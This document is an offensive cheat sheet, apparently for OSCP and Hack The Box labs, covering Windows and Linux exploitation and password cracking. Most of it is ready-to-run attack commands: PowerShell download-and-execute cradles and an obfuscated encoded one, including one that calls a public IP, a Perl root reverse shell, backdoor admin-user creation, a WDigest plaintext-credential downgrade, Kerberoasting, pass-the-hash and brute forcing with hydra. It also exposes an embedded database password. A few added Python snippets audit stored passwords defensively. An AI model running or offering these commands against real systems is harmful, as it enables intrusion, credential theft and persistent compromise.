Exploitation (Attack)
All you need to know about basic host-based exploitation for OSCP
Windows Exploitation
Basic commands
Add user
net user $username $password /add
Add a user to a group
net localgroup "$groupname" $username /add
Make the user a local administrator
net localgroup administrators $username /add
Find out Windows System Information
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
Windows Patch Status
wmic qfe get Caption,Description,HotFixID,InstalledOn
Find plaintext passwords
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini
Find files whose names contain those strings (config files included)
dir /s *pass* == *cred* == *vnc* == *.config*
Find "password" in all files under the current directory, with line numbers
findstr /spin "password" *.*
Download files from the attacker box (Kali) to the target via PowerShell
powershell.exe IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.39/rev.ps1')
powershell.exe invoke-webrequest -uri http://$attackerip/nc.exe -outfile C:\users\user\appdata\local\temp\nc.exe
Other downloading and uploading techniques
Download Github repo: https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70
You need to manually edit the PowerShell script so that it runs itself without -C or -Command.
For example, using Invoke-PowerShellTcp.ps1 from /opt/nishang/Shells/Invoke-PowerShellTcp.ps1,
invoke the function by appending this command to the end of the PowerShell file:
Invoke-PowerShellTcp -Reverse -IPAddress $listenerip -Port 4444

You can then host the file and execute it on the victim just by invoking DownloadString, without the PowerShell -Command argument. This technique is widely used to create so-called file-less malware, where the malicious script is executed directly in the memory of the victim machine without dropping any file on the hard disk, and it is used to bypass signature-based detection.
powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.8:8000/Invoke-PowerShellTcp.ps1')"
Or you can invoke the function explicitly via a PowerShell command string. For example,
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.8:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress $listenerip -Port 4444"
Also for PS versions 1 and 2
PS Version 1
c:\Windows\System32\cmd.exe /c powershell.exe -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('http://45.58.34.196:8080/p')"
PS Version 2
c:\windows\system32\cmd.exe /c PowErsHelL.EXE -eXecUtiONPoLICy bYPass -NOPROfilE -WinDoWSTYlE hiDden -EnCodeDcOmmAnd IAAoAE4AZQB3AC0ATwBiAEoAZQBDAFQAIABzAFkAcwB0AEUAbQAuAG4AZQBUAC4AdwBlAGIAQwBsAEkARQBOAFQAKQAuAEQATwBXAG4AbABvAGEAZABGAEkAbABlACgAIAAdIGgAdAB0AHAAcwA6AC8ALwBqAHQAYQBiA
Finding passwords in the Registry
VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"
Windows autologin
reg.exe query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\WinLogon" /v DefaultUserName
reg.exe query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\WinLogon" /v DefaultPassword
Or via PowerShell, using Get-ItemProperty to read the registry
PS > Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*"
SNMP Parameters
reg.exe query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
PuTTY
reg.exe query "HKCU\Software\SimonTatham\PuTTY\Sessions"
Search for "password" in the registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Finding credentials in Groups.xml
dir Groups.xml /s
On the attacker box, you can decrypt the Group Policy Preferences password (the cpassword value) via:
gpp-decrypt $cpassword
To find more information: http://www.fuzzysecurity.com/tutorials/16.html
Finding saved admin credentials in AppData
dir /a C:\Users\$user\AppData\Roaming\Microsoft\Credentials\
Running commands as a different user with saved credentials using the runas command
runas /user:ACCESS\Administrator /savecred "cmd.exe /c type C:\Users\Administrator\Desktop\root.txt > C:\Users\security\AppData\Local\Temp\test.txt"
Enable RDP on the Windows target
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
Port 88 - Kerberoasting
Once you have a user shell you can start Kerberoasting to get other users' credentials.
Without a password (you will be prompted)
python GetUserSPNs.py -request active.htb/SVC_TGS
With a password
GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
Then try cracking the Kerberos ticket with
john GetUserSPNsOutput.txt --wordlist=/usr/share/wordlists/rockyou.txt
Then login with psexec.py.
psexec.py [email protected]
You can choose the service name used on the target with -service-name to avoid antivirus detection.
psexec.py active.htb/Administrator:[email protected] -service-name LUALL.exe
Exploiting AD users
You should import the ActiveDirectory module first.
Import-Module ActiveDirectory
Add an AD member to a group
Add-ADGroupMember -Identity "$group" -Members $member
Other Useful commands
strings prints the text strings embedded in binary files such as executables; in the example below it reveals a connection string with a database password.
root@kali:~/htb/tally# strings tester.exe
!This program cannot be run in DOS mode.
Rich7J
~~~
~~~
SQLSTATE:
Message:
DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;
select * from Orchard_Users_UserPartRecord
~~~
~~~
Transferring a file to Windows
echo open $attackerip 21> ftp.txt
echo USER offsec>> ftp.txt
echo password>> ftp.txt
echo bin>> ftp.txt
echo GET shell.php>> ftp.txt
echo bye>> ftp.txt
Then run
ftp -v -n -s:ftp.txt
List all scheduled tasks
schtasks /query /fo LIST /v
And extra miscellaneous things to check:
Find GPP passwords in SYSVOL
findstr /S cpassword $env:logonserver\sysvol\*.xml (PowerShell)
findstr /S cpassword %logonserver%\sysvol\*.xml (cmd.exe)
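The two findstr checks above and the Groups.xml section earlier both look for the cpassword attribute. This added example (not part of the original page) does the same audit in Python over a SYSVOL-like directory tree, reporting every preference file that still stores a cpassword; the GUIDs, account name and cpassword value are constructed placeholders.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# Constructed sample Groups.xml (hypothetical GUIDs, account and cpassword,
# not from a real domain). cpassword is the AES-encrypted local-account
# password that Group Policy Preferences used to store in SYSVOL.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{00000000-0000-0000-0000-000000000001}">
  <User clsid="{00000000-0000-0000-0000-000000000002}" name="svc_backup">
    <Properties action="U" newName="" fullName="" description=""
        cpassword="EXAMPLEcpasswordBASE64placeholder==" changeLogon="0"
        noChange="1" neverExpires="1" acctDisabled="0" userName="svc_backup"/>
  </User>
</Groups>
"""

def find_cpasswords(root_dir):
    """Walk a SYSVOL-like tree; return (relative path, account, cpassword) for
    every non-empty cpassword attribute. All .xml files are checked because
    Services.xml, ScheduledTasks.xml, DataSources.xml and Drives.xml can
    carry the same attribute under other account fields."""
    hits = []
    for dirpath, _, filenames in os.walk(root_dir):
        for name in filenames:
            if not name.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, name)
            try:
                tree = ET.parse(path)
            except ET.ParseError:
                continue  # not a well-formed preference file; skip it
            for elem in tree.iter():
                cpw = elem.get("cpassword")
                if cpw:  # cpassword="" means no password is stored
                    account = (elem.get("userName") or elem.get("accountName")
                               or elem.get("runAs") or "?")
                    hits.append((os.path.relpath(path, root_dir), account, cpw))
    return hits

def demo():
    """Write the constructed sample into a temporary SYSVOL layout and audit it."""
    with tempfile.TemporaryDirectory() as sysvol:
        gpo = os.path.join(sysvol, "Policies", "{GPO-GUID}", "Machine",
                           "Preferences", "Groups")
        os.makedirs(gpo)
        with open(os.path.join(gpo, "Groups.xml"), "w") as fh:
            fh.write(SAMPLE_GROUPS_XML)
        return find_cpasswords(sysvol)
```

Point find_cpasswords at a mounted \\dc\SYSVOL copy to list every GPO that still needs the stored password removed.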
Run a PowerShell prompt as a different user, without loading the profile on the machine [replace DOMAIN and USER]
runas /user:DOMAIN\USER /noprofile powershell.exe
Insert the registry key that enables WDigest plaintext credential caching on newer versions of Windows
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
Linux Exploitation
Spawning an interactive TTY Linux shell
python -c 'import pty; pty.spawn("/bin/sh")'
export PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin
Then Ctrl-Z
stty raw -echo
fg
Type reset and hit return.
Exploiting directory permissions
Find any writable directories
find / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \;
Or use
find / -writable -type d 2>/dev/null
find / -perm -222 -type d 2>/dev/null
find / -perm -o=w -type d 2>/dev/null
Finding only executable folders
find / -perm -o=x -type d 2>/dev/null
Finding writable and executable folders
find / \( -perm -o=w -perm -o=x \) -type d 2>/dev/null
Find commands that you are allowed to run as root without a password
sudo -l
You'll see a result similar to the one below. In this case, user shelly can run /usr/bin/perl as root with no password.

e.g.) If you are allowed to use the perl command as root, you can get a root reverse shell straight away
sudo perl -e 'use Socket;$i="10.10.14.43";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
If this doesn't give you any hints,
check the kernel version of the victim machine
uname -ar
cat /proc/version
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release # Debian based
cat /etc/redhat-release # Redhat based
Try googling the kernel version for privilege escalation exploits to try out.
Check the bash history
cat .bash_history
Check the processes that are running
ps aux | grep $service
Finding plaintext passwords on a web server
Plaintext passwords in /var/www/html/*.php
cat /var/www/html/config.php | grep password
In mail spools (/var/spool/mail is a directory, so recurse into it)
grep -r $item /var/spool/mail
Or using LinEnum.sh
LinEnum.sh -t -k password
Checking which services are listening
netstat -anlp
GTFOBins
SUID
find / -perm -u=s -type f 2>/dev/null
SGID
find / -perm -g=s -type f 2>/dev/null
Automation Tools
There are three useful automation tools that I use the most, which are
LinEnum.sh
https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
curl http://$attackerip/LinEnum.sh | /bin/bash
chmod +x LinEnum.sh
./LinEnum.sh
pspy
pspy is a command line tool designed to snoop on processes without need for root permissions.
Cron job watching with pspy
~/pspy (master) $ make example
Other useful commands
List file capabilities (binaries with capabilities set)
getcap -r / 2>/dev/null
Password Cracking
Below is the cracking methodology used in CTF challenges.
Creating a password list
1) You can create your own dictionary, or combine two different wordlists, by
cat wordlist >> wordlist2
2) Create a customised wordlist from an HTML page
curl http://example.com > example.txt
html2dic example.txt
Or use CeWL
cewl -w createWordlist.txt -m 6 https://www.example.com
-w is the output file and -m is the minimum word length.
Cracking Tools
To identify which hash type it is encrypted with, use either of the commands below, built into Kali
hash-identifier
hashid
Cracking Hash
Two Kali built-in tools can be used, hashcat and john.
Hashcat
hashcat -m 13100 -a 0 -o found.txt admin.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule
-m = hash mode; 13100 denotes Kerberos 5 TGS-REP etype 23
-a = attack mode; 0 denotes straight (wordlist)
-o = output file
-r = rule file applied to each wordlist candidate
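Mode 13100 only fits RC4 (etype 23) tickets; AES tickets (etype 17/18) carry a different prefix and need a different -m. This added example (not part of the original page) parses $krb5tgs$ lines in the layout GetUserSPNs.py produces and reports the etype and matching hashcat mode before a long run is started; the accounts, realms and hex values are constructed.

```python
import re

# Constructed sample lines (hypothetical accounts, shortened hex), in the
# layout GetUserSPNs.py emits for hashcat/john. Etype 23 is RC4-HMAC (the
# page's -m 13100); 17 and 18 are AES and need different modes.
SAMPLE_HASHES = [
    "$krb5tgs$23$*svc_tgs$ACTIVE.HTB$active/CIFS~445*$"
    "0123456789abcdef0123456789abcdef$aabbccdd",
    "$krb5tgs$18$svc_sql$CORP.LOCAL$*MSSQLSvc/db01.corp.local:1433*$"
    "fedcba9876543210$11223344",
    "$krb5tgs$17$svc_web$CORP.LOCAL$*HTTP/web01.corp.local*$"
    "0011223344556677$55667788",
]
HASHCAT_MODES = {23: 13100, 17: 19600, 18: 19700}

# etype 23: $krb5tgs$23$*user$REALM$spn*$checksum(32 hex)$edata2
_RC4 = re.compile(r"^\$krb5tgs\$23\$\*([^$]+)\$([^$]+)\$([^*]+)\*\$"
                  r"([0-9a-f]{32})\$([0-9a-f]+)$")
# etype 17/18: $krb5tgs$18$user$REALM$*spn*$checksum$edata2
_AES = re.compile(r"^\$krb5tgs\$(17|18)\$([^$]+)\$([^$]+)\$\*([^*]+)\*\$"
                  r"([0-9a-f]+)\$([0-9a-f]+)$")

def parse_tgs_hash(line):
    """Return (etype, user, realm, spn, hashcat_mode) for one $krb5tgs$ line;
    raise ValueError otherwise, so a mangled copy-paste is caught early."""
    line = line.strip()
    m = _RC4.match(line)
    if m:
        return 23, m.group(1), m.group(2), m.group(3), HASHCAT_MODES[23]
    m = _AES.match(line)
    if m:
        etype = int(m.group(1))
        return etype, m.group(2), m.group(3), m.group(4), HASHCAT_MODES[etype]
    raise ValueError("not a recognised $krb5tgs$ line: %r" % line[:40])

def is_tgs_hash(line):
    try:
        parse_tgs_hash(line)
        return True
    except ValueError:
        return False

def group_by_mode(lines):
    """Bucket hash lines by the hashcat -m they need (one mode per run)."""
    buckets = {}
    for line in lines:
        mode = parse_tgs_hash(line)[4]
        buckets.setdefault(mode, []).append(line.strip())
    return buckets
```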
John the Ripper
john --wordlist=wordlist.txt dump.txt
KeePass password
keepass2john CEH.kdbx > crackthis.hash
john --wordlist=wordlist.txt crackthis.hash
Or
hashcat64.exe -m 13400 .\crackthis.hash .\rockyou.txt
PuTTY key (.ppk) to an OpenSSH key
puttygen my_private_key.ppk -O private-openssh -o alice.key
chmod 600 alice.key
Linux shadow passwords
First you need to combine the passwd file with the shadow file using the unshadow program.
unshadow passwd-file.txt shadow-file.txt > unshadowed.txt
john --rules --wordlist=wordlist.txt unshadowed.txt
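What unshadow does is a simple merge on the user name, and the merged hash field tells you which crypt(3) scheme each account uses. This added example (not part of the original page) reimplements that merge in Python and classifies each entry, flagging legacy md5crypt/DES hashes, locked accounts and empty password fields; the users, salts and hashes are constructed dummies.

```python
# Constructed sample passwd and shadow lines (hypothetical users, dummy
# salts/hashes); the real /etc/shadow is readable by root only.
PASSWD = """root:x:0:0:root:/root:/bin/bash
shelly:x:1000:1000:Shelly:/home/shelly:/bin/bash
legacy:x:1001:1001::/home/legacy:/bin/sh
svc:x:1002:1002::/var/svc:/usr/sbin/nologin
"""
SHADOW = """root:$6$saltsalt$dummyhash:18000:0:99999:7:::
shelly:$y$j9T$saltsalt$dummyhash:18000:0:99999:7:::
legacy:$1$saltsalt$dummyhash:15000:0:99999:7:::
svc:!:18000:0:99999:7:::
"""

# crypt(3) prefixes; $1$ (md5crypt) and 13-char DES entries are the weak ones
# worth flagging in an audit, since john cracks them far faster than sha512crypt.
ALGOS = {"$1$": "md5crypt", "$2": "bcrypt", "$5$": "sha256crypt",
         "$6$": "sha512crypt", "$7$": "scrypt", "$y$": "yescrypt"}

def unshadow(passwd_text, shadow_text):
    """Merge like unshadow(1): replace passwd's 'x' field with the hash from
    shadow for the same user name. Users missing from shadow keep 'x'."""
    hashes = {}
    for line in shadow_text.splitlines():
        if line and not line.startswith("#"):
            user, hash_, _ = line.split(":", 2)
            hashes[user] = hash_
    merged = []
    for line in filter(None, passwd_text.splitlines()):
        fields = line.split(":")
        fields[1] = hashes.get(fields[0], fields[1])
        merged.append(":".join(fields))
    return merged

def classify(hash_field):
    """Name the hash scheme of one shadow field, or flag locked/empty ones."""
    if hash_field == "":
        return "EMPTY (login without password)"
    if hash_field.startswith(("!", "*")):
        return "locked"
    for prefix, name in ALGOS.items():
        if hash_field.startswith(prefix):
            return name
    if len(hash_field) == 13 and "$" not in hash_field:
        return "des-crypt (legacy, 8-char limit)"
    return "unknown"

def audit(passwd_text, shadow_text):
    return {line.split(":")[0]: classify(line.split(":")[1])
            for line in unshadow(passwd_text, shadow_text)}
```

Feed the output of unshadow to john exactly as the page does; the audit dict tells you which accounts to fix regardless of whether they crack.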
Decoding Base64
cat $encodedfile | base64 --decode > decodedfile.txt
Cracking a zip file password
fcrackzip -D -p /usr/share/wordlists/rockyou.txt data.zip
Convert Hex to Binary
cat hex.txt | xxd -r -p
Online Tools
Cracking passwords for services
Port 22 - SSH
hydra -l root -P wordlist.txt $targetip ssh
hydra -L userlist.txt -P pass.txt ssh://$targetip
Cracking a private RSA key passphrase
python ssh2john.py user_rsa > crackable.txt
john --wordlist=/usr/share/wordlists/rockyou.txt crackable.txt
Port 161 - SNMP
hydra -P wordlist.txt -v 102.168.0.101 snmp
Port 3389 - RDP
ncrack -vv --user admin -P password-file.txt rdp://192.168.0.101
Port 80/443 htaccess
Password-protect a directory with .htaccess
Step 1
Create the directory that you want to password-protect and create a .htaccess file inside it. Content of .htaccess:
AuthType Basic
AuthName "Password Protected Area"
AuthUserFile /var/www/html/test/.htpasswd
Require valid-user
Create .htpasswd file
htpasswd -cb .htpasswd test admin
service apache2 restart
This creates a file called .htpasswd with the user test and the password admin.
If the directory does not display a login prompt, you might have to add this to the apache2.conf file:
<Directory /var/www/html/test>
AllowOverride AuthConfig
</Directory>
Then bruteforce with
medusa -h 192.168.1.101 -u admin -P wordlist.txt -M http -m DIR:/test -T 10
Apache Tomcat
hydra -C /usr/share/seclists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt http://10.10.10.95:8080/manager/html
HTTP POST Login Form
hydra 10.10.10.43 -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect*"
Pass The Hash
You can authenticate to services using a valid username and the NTLM hash value, without knowing the plaintext password.
SMB PTH
export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896
pth-winexe -U administrator //$targetip cmd
pth-winexe -U admin%$lmhash:$nthash //$targetip cmd
e.g)
pth-winexe --user=jeeves/administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe
smbclient //$targetip/C$ -U "$targetuser" --pw-nt-hash $hash
RDP PTH
By using evil-winrm https://github.com/Hackplayers/evil-winrm
evil-winrm -u "$targetuser" --hash $hash -i $targetip
By using freerdp-x11 (/pth takes the NT hash only)
apt-get install freerdp-x11
xfreerdp /u:admin /d:win7 /pth:$nthash /v:$targetip
Misc: Windows password hashes in SAM
You need two registry hive files from Windows: the SYSTEM hive (which holds the boot key) and the SAM hive (which holds the hashes).
The SAM hive can be found here (%SYSTEMROOT% is usually C:\Windows)
%SYSTEMROOT%\repair\SAM
windows\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
The SYSTEM hive can be found here
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\RegBack\system
Then extract the password hashes
pwdump system sam